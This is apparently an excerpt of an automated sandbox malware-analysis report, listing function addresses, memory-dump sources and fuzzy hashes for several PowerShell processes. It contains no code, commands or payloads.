Function 00007FF848F1604D Relevance: 1.3, Instructions: 1289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3420820372.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad54804e585508563c200ca2257e1dcbc071faf21a5a8d57fbadb10db849ba71
Instruction ID: eabe28f12ae1f09f804c24eaee8465840838cefff26cc128dc22be5ade7362d7
Opcode Fuzzy Hash: ad54804e585508563c200ca2257e1dcbc071faf21a5a8d57fbadb10db849ba71
Instruction Fuzzy Hash: B742D132E0DA668FE755FB6CA4955E97BA0EF543A5F04017BD088CB183DB2CAC4683D4

Function 00007FF848FE30E9 Relevance: .7, Instructions: 662COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3430737275.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ada78cc3470754286d0fd8ae8f50016ec8ccf05e0e71f49a940f2658f6960d8
Instruction ID: c55dbd5f372e1e817cbb6bf58a4072362e6da1fc11b8a287c8d2575583dd0c6c
Opcode Fuzzy Hash: 4ada78cc3470754286d0fd8ae8f50016ec8ccf05e0e71f49a940f2658f6960d8
Instruction Fuzzy Hash: D112D131E0EB8A4FE396AB2C58595717BE1EF962A0F0901FBC44DC71D3DA1DAC068356

Function 00007FF848FE3361 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3430737275.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c1d1bfa49c6cc4084424d9018f914bcd4da57311ac9222cee7579aba84bae1
Instruction ID: e0a1a431de95cc027bacbf82fdce33b07f2014dd8857ee32e0302eaa497a2309
Opcode Fuzzy Hash: 15c1d1bfa49c6cc4084424d9018f914bcd4da57311ac9222cee7579aba84bae1
Instruction Fuzzy Hash: CA51F232E1DA8A4FE3A6E72C18585307BD2EF95790F0901BAC44DCB5D3DE1DAC45834A

Function 00007FF848F19708 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3420820372.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956f777d6d9eedb58d7707dd0f335cbe7b55559ad5cf3bf7a8fe3a0992b51a74
Instruction ID: 9b9928f6f2c50cc3ff31627bf734fcce95578600c2714c0fea7df4eb4284d1aa
Opcode Fuzzy Hash: 956f777d6d9eedb58d7707dd0f335cbe7b55559ad5cf3bf7a8fe3a0992b51a74
Instruction Fuzzy Hash: B0513631E0CA888FE719AB6CAC0A6B8BFE0FF55710F44416FD04883597DA24AC56C7C6

Function 00007FF848DFEB60 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3410107246.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848dfd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9b9ee828458eccbb9597aaeae845451e6764ddf8f77d5322aea37907edc561
Instruction ID: 01625f5f9edb76fdcd4c860e759a6ce8cfecb7eb1f26aa8142cf8ec48a5a8e36
Opcode Fuzzy Hash: ec9b9ee828458eccbb9597aaeae845451e6764ddf8f77d5322aea37907edc561
Instruction Fuzzy Hash: 6C41263180EBC44FE7569B2898456623FF0EF56311F1505DFD088CF1A7D725A849C7A2

Function 00007FF848F1A73C Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3420820372.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e48ed0ffb43e9cad79576b13653d311a89a283f747f4666e8c32140e996ac02f
Instruction ID: 3ba7599ea36faffa45a52fda8c62018c6e0f32aa7cab3ebb62133cea5dc5ffbd
Opcode Fuzzy Hash: e48ed0ffb43e9cad79576b13653d311a89a283f747f4666e8c32140e996ac02f
Instruction Fuzzy Hash: BC31F93190DB8C4FDB59DF6898496E97FE0EF66321F0441AFC049C7193D678984ACB52

Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3420820372.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Function 00007FF848FE4143 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3430737275.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d376e2adc8ed732d8cf02bf39a00a4556a3cc37094e63495d5c72e38aeaf67c2
Instruction ID: f4989e61dbcfb2c3c284ba15285a87d0d0432530f44ee2a4d1c4e0b5f1984d23
Opcode Fuzzy Hash: d376e2adc8ed732d8cf02bf39a00a4556a3cc37094e63495d5c72e38aeaf67c2
Instruction Fuzzy Hash: F8F0F431A0D9448FD755EB1CA8004B477E0FF69360F1800BAD04DC70A3DA29AC418344

Function 00007FF848F19CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3420820372.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8189bca01d9cbfae4054be8bc405492882ff7137a649e5acf925b01677257558
Instruction ID: 5eb059ed6d9443675e2291c9f651cf90a7b5e64ba2f5f772542ad1c08717d1e8
Opcode Fuzzy Hash: 8189bca01d9cbfae4054be8bc405492882ff7137a649e5acf925b01677257558
Instruction Fuzzy Hash: C3F0B43180C6894FDB46EF2888595D57FA0EF26350F0402DBE458C70A2DB659858CBC2

Function 00007FF848FE41D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3430737275.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: bd13b7360621c8f1dc224687372ce8c208df969c6eec68ee8d726599daf62f98
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: B3E01A31B0C8088FDB69EB0CE0409B973E1FBA8361B1101BBD14EC75A1CB2AEC518B84

Non-executed Functions

Function 00007FF848F184E3 Relevance: 6.4, Strings: 5, Instructions: 119COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FF848F18572
N_^, xrefs: 00007FF848F185C2
N_^, xrefs: 00007FF848F18562
N_^, xrefs: 00007FF848F18522
N_^, xrefs: 00007FF848F18502

Memory Dump Source

Source File: 00000012.00000002.3420820372.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^$N_^
API String ID: 0-2528851458
Opcode ID: 70e401f08726664cc9b0bf6bec9ccada6e1bb7083c16736b2972bf8ff16f06c4
Instruction ID: c9ecfd1d8018f70dee2736e2809a08d0f02e6e3c337718a2f8120115aee94211
Opcode Fuzzy Hash: 70e401f08726664cc9b0bf6bec9ccada6e1bb7083c16736b2972bf8ff16f06c4
Instruction Fuzzy Hash: 2D316167E1EAD25FE35B57386D750E02F91EF637A5B4D00EAC1D84B0D3EE085C069206

Analysis Process: powershell.exePID: 6300, Parent PID: 6780COMMON

Executed Functions

Function 00007FF848FF6605 Relevance: 7.9, Strings: 6, Instructions: 431COMMON

Download Yara Rule

Strings

X7+^, xrefs: 00007FF848FF67FD
(B$I, xrefs: 00007FF848FF6974
(B$I, xrefs: 00007FF848FF6858
(B$I, xrefs: 00007FF848FF678C
(B$I, xrefs: 00007FF848FF67C3
(B$I, xrefs: 00007FF848FF66ED

Memory Dump Source

Source File: 00000014.00000002.3455585274.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID: (B$I$(B$I$(B$I$(B$I$(B$I$X7+^
API String ID: 0-3095436849
Opcode ID: 0c5983bb295f42b1357589dc5f8a97314f46101a73df412542ffe750fc27bcf1
Instruction ID: f2da0e56009521442569585ee4c6c61c29c41ae48e8ab85ed8c65695ad7a66f8
Opcode Fuzzy Hash: 0c5983bb295f42b1357589dc5f8a97314f46101a73df412542ffe750fc27bcf1
Instruction Fuzzy Hash: 74D10031D0EA8A5FEB99AB2858155B57BA0FF1A390F1801FFD10DCB0D3EE19A805C355

Function 00007FF848FF4370 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

p>$I, xrefs: 00007FF848FF43ED

Memory Dump Source

Source File: 00000014.00000002.3455585274.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID: p>$I
API String ID: 0-2590420872
Opcode ID: 2f174740e6e9efff68b38bed27620fccdb3be1078aed717e970d637b64755c5a
Instruction ID: e3d6449764838abff00d9e6aeaed33284ac2b37b4e170ae9f73199b8085dbfc9
Opcode Fuzzy Hash: 2f174740e6e9efff68b38bed27620fccdb3be1078aed717e970d637b64755c5a
Instruction Fuzzy Hash: B0413632E0DA894FE7A9EB2C64506B47BE1EF64760F0801BBC64DC71D3EB18AC118385

Function 00007FF848FF43BC Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

p>$I, xrefs: 00007FF848FF43ED

Memory Dump Source

Source File: 00000014.00000002.3455585274.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID: p>$I
API String ID: 0-2590420872
Opcode ID: aaf41450422227acb49445f48f69e6321b1ddb55ecc63a7132e3d4c28454c1ee
Instruction ID: a21f5c0a083a4bca28af753d3453bd6a3c38132536a50bb985f2eb4f5988b130
Opcode Fuzzy Hash: aaf41450422227acb49445f48f69e6321b1ddb55ecc63a7132e3d4c28454c1ee
Instruction Fuzzy Hash: 9511E332D0E5894FE7A9EB2C98505B47BD1FF60660F4800BBD61DD71D2EB18AC549385

Function 00007FF848F29728 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3445993708.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3397dbb1d1f429a2094d7f9bcde785765fa03efbeac74712776a9664b6a243ee
Instruction ID: b94fbb4651390dc19b441533b59da9063d1db0347ea185d3456c5379370adec9
Opcode Fuzzy Hash: 3397dbb1d1f429a2094d7f9bcde785765fa03efbeac74712776a9664b6a243ee
Instruction Fuzzy Hash: 32413831E0CB889FDB19AB6878466F97BE1FB55700F14416FE04883297DA35A806C7C6

Function 00007FF848E0E700 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3435933059.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848e0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 223a9c7bed8147fbac3ec03d1d162440e9048f0975d28876bcbb2b67bbe0dc0c
Instruction ID: 1ab29eb3b295979ad0312294a8a0b6aacc89b97f5f497914152f2cf5625824de
Opcode Fuzzy Hash: 223a9c7bed8147fbac3ec03d1d162440e9048f0975d28876bcbb2b67bbe0dc0c
Instruction Fuzzy Hash: 8941237080DBC44FE7569B289855A523FF0FF53220F0905EFD488CB1A3E625A846C7A2

Function 00007FF848F2A4AC Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3445993708.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 364dc869c61dbd3c2c3373dda25944ab7f4b629702ee31e898417e8aee097d66
Instruction ID: a9f9b37f91b3778912a18a976af7ac0f342170ae1889707a7d22ca31f0aeba4b
Opcode Fuzzy Hash: 364dc869c61dbd3c2c3373dda25944ab7f4b629702ee31e898417e8aee097d66
Instruction Fuzzy Hash: E721687080D7884FEB09DB689C4AAF97FE4DF53321F08429FD085CB1A3CA69944AC761

Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3445993708.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46

Function 00007FF848FF4143 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3455585274.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83302d7cfb4e95f9fbc841a5078a49225d733e31ccfd5ac2c74fb52099b6f510
Instruction ID: 2e1c4d03b9ebb66b2e18b26977a2faf8fdecc3c6d6fc9b5b2988b5f7e42f0604
Opcode Fuzzy Hash: 83302d7cfb4e95f9fbc841a5078a49225d733e31ccfd5ac2c74fb52099b6f510
Instruction Fuzzy Hash: 92F02232A0D5848FD35AEB1CE8404A8B7E0FF25360F1800BBE24DC70A3EB25AC818348

Function 00007FF848F29CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3445993708.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb01060b0108993c108da1f1c9545227c84907c20374fac6ac0baadac0d4f5a
Instruction ID: 23c84a73fa8a48c682b513f987082706650d2cad39691ec7ccef21b7e298ac46
Opcode Fuzzy Hash: 3cb01060b0108993c108da1f1c9545227c84907c20374fac6ac0baadac0d4f5a
Instruction Fuzzy Hash: A6F0B43180C6894FDB46EF2898599D57FA0EF16350F44029BE458C74A2DB659458CB82

Function 00007FF848FF41D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3455585274.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: d769517fa595beb740091979c284fb2f197ba556f1da16d26ccdbdaf57273a59
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 76E0123170C4048FD669EB0CE0409A973E1FBA8361B1101B7E24EC7561C721EC518B84

Non-executed Functions

Function 00007FF848F28BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

M_^<, xrefs: 00007FF848F28C2A
M_^6, xrefs: 00007FF848F28BFA
M_^J, xrefs: 00007FF848F28C7A
M_^I, xrefs: 00007FF848F28C72
M_^F, xrefs: 00007FF848F28C6A

Memory Dump Source

Source File: 00000014.00000002.3445993708.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID: M_^6$M_^<$M_^F$M_^I$M_^J
API String ID: 0-1500707516
Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
Instruction ID: 222d844bbf94215a77f2e18ad69bec1db98ceac06232a07d42ecf6d4690642d1
Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
Instruction Fuzzy Hash: 94215777319455EED20137ADB8005DD7390DB902BA78803B3E158CF043EE1CA08746D4

Analysis Process: powershell.exePID: 4028, Parent PID: 6780COMMON

Executed Functions

Function 00007FF849006605 Relevance: 6.7, Strings: 5, Instructions: 432COMMON

Download Yara Rule

Strings

(B$I, xrefs: 00007FF8490067C3
(B$I, xrefs: 00007FF849006974
(B$I, xrefs: 00007FF8490066ED
(B$I, xrefs: 00007FF84900678C
(B$I, xrefs: 00007FF849006858

Memory Dump Source

Source File: 00000016.00000002.3426405162.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: (B$I$(B$I$(B$I$(B$I$(B$I
API String ID: 0-3685135179
Opcode ID: 2fcd8f088e52472d45c2127acf2beccaa45f6bc7d64cb50c913e3b8942d3c46f
Instruction ID: 1df4f912e9cfca9330b5a7b09aeefcda1f99dae10077994df314b6486bd73801
Opcode Fuzzy Hash: 2fcd8f088e52472d45c2127acf2beccaa45f6bc7d64cb50c913e3b8942d3c46f
Instruction Fuzzy Hash: AAC12332D0EACA5FEB69EF28A8155B57BE2FF15754F0802FAD04DD7093EA18E8058351

Function 00007FF849004370 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

p>$I, xrefs: 00007FF8490043ED

Memory Dump Source

Source File: 00000016.00000002.3426405162.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: p>$I
API String ID: 0-2590420872
Opcode ID: 3deac11cd508c62b60ae94cbf2420701bd73926777e9cf8b064de58440084073
Instruction ID: 0292cecc92934bcb70aa7f8eefd41269530e2643317dca7a12fa9ac5da675a8d
Opcode Fuzzy Hash: 3deac11cd508c62b60ae94cbf2420701bd73926777e9cf8b064de58440084073
Instruction Fuzzy Hash: 1C41E132E0DA894FEBB9EA2C74516B47BE1EF85660B1801FAC14DC7183FA18EC058385

Function 00007FF8490043BC Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

p>$I, xrefs: 00007FF8490043ED

Memory Dump Source

Source File: 00000016.00000002.3426405162.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: p>$I
API String ID: 0-2590420872
Opcode ID: 28b46add50a5966c984145d43c277dfc7e1b870abb49f374b3c71ac7f643abd7
Instruction ID: 4d5f507d409f5cb4b02193eff19853fc476c2b708c76dbc40a34c1c06ec060fc
Opcode Fuzzy Hash: 28b46add50a5966c984145d43c277dfc7e1b870abb49f374b3c71ac7f643abd7
Instruction Fuzzy Hash: BE11CE32D0E9CA4FEBB9EE2CA8505B87BD1EF406A0B4910FAD11DC7093FA18EC448345

Function 00007FF849003335 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3426405162.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fffa1bc6b089cf8f94336854d944d4dc41b342980ea308db160498e89facdff
Instruction ID: f26ff955a4762bd705aee0ce417db3f2cd0d4b0aeeff5754393c12794cbcf7f2
Opcode Fuzzy Hash: 2fffa1bc6b089cf8f94336854d944d4dc41b342980ea308db160498e89facdff
Instruction Fuzzy Hash: 3AB1F821E0DBC60FEBA7AB2828651717BE1EF56651B4900FBC44DCB1E3ED19EC458352

Function 00007FF848F39708 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3416440611.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5666e1e8f582de00daec2c5063ed4dc65951b763ae8b1d4d0a7ec2ee40b29827
Instruction ID: 7fa309cfcbe3900f7c0fa3a585108deca48f61080765a2a0249df6ce45d70b53
Opcode Fuzzy Hash: 5666e1e8f582de00daec2c5063ed4dc65951b763ae8b1d4d0a7ec2ee40b29827
Instruction Fuzzy Hash: 79511471E0CB888FEB19EB2C9C4A6A97BE0FB55710F04416FD048835D3DB24A856C786

Function 00007FF848E1EB60 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3407151419.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3434c78cc78624accfe5b0a8834369515b5ab7cecf660169966178f66f9aa83
Instruction ID: ec582098632d7d07cbd1cd1db8f7d7ad406bdd6ab43a5f109eaea40d3309245c
Opcode Fuzzy Hash: d3434c78cc78624accfe5b0a8834369515b5ab7cecf660169966178f66f9aa83
Instruction Fuzzy Hash: EB414971C0DBC58FE7A69B2898459623FF0FF56350F0501DFE089CB0A3DA25A845C7A2

Function 00007FF848F3A73C Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3416440611.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9133159744a611a31af0e7bef2b823056a5016428783bb9e55c2b5dd0d685b6
Instruction ID: 7ba5dc28e8c281c9a82112215cf4a9bdbf691cddbcc8915ede13dedab60d6d77
Opcode Fuzzy Hash: a9133159744a611a31af0e7bef2b823056a5016428783bb9e55c2b5dd0d685b6
Instruction Fuzzy Hash: 1931097180EBC84FE715DB685C896B97FE4DF13220F1841EFD085CB1A3D669584AC761

Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3416440611.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Function 00007FF849004143 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3426405162.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7344d2bf1019af5ee561223d27e85a6ee5e98a7e84f26f01e7ff0734a165db
Instruction ID: d3c6fed0e7efc8abd4ea11470eaa89104f97b7a6937dbe9ee09b4868e343da61
Opcode Fuzzy Hash: 4e7344d2bf1019af5ee561223d27e85a6ee5e98a7e84f26f01e7ff0734a165db
Instruction Fuzzy Hash: E5F0CD32A0D9858FDBA9EE1CF8454E8B7E5EF59360B1900FAD14DC7063FA26EC858744

Function 00007FF848F39CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3416440611.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6380d33374023ff13bfd139dc372fce5e4fd1c94474d15e9e6b450be7603173
Instruction ID: a91185d0a22b7161203c533c9dff6601346ccfb87127ed12e2b01d1ad47a603d
Opcode Fuzzy Hash: f6380d33374023ff13bfd139dc372fce5e4fd1c94474d15e9e6b450be7603173
Instruction Fuzzy Hash: 5CF0B43180C68D4FEB46EF28885A5D57FA0EF17251F04029BE458C75A2DB659458CB82

Function 00007FF8490041D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3426405162.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: c35c486b478612a7d6b0b66b499078fd92c76872f7a3e98c68b3026501c1cf2a
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 5DE01A31B0C8089FDB78EE0CF0409E973E5EB9836175101FBD14EC7562EA22EC518B84

Non-executed Functions

Function 00007FF848F384E5 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FF848F38502
L_^, xrefs: 00007FF848F38562
L_^, xrefs: 00007FF848F38522
L_^, xrefs: 00007FF848F38572
L_^, xrefs: 00007FF848F385C2

Memory Dump Source

Source File: 00000016.00000002.3416440611.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^$L_^
API String ID: 0-2264858084
Opcode ID: 319473fe5c96bc5cb9e6a03b96dc8682f6355c09981547596492091c30ee0d79
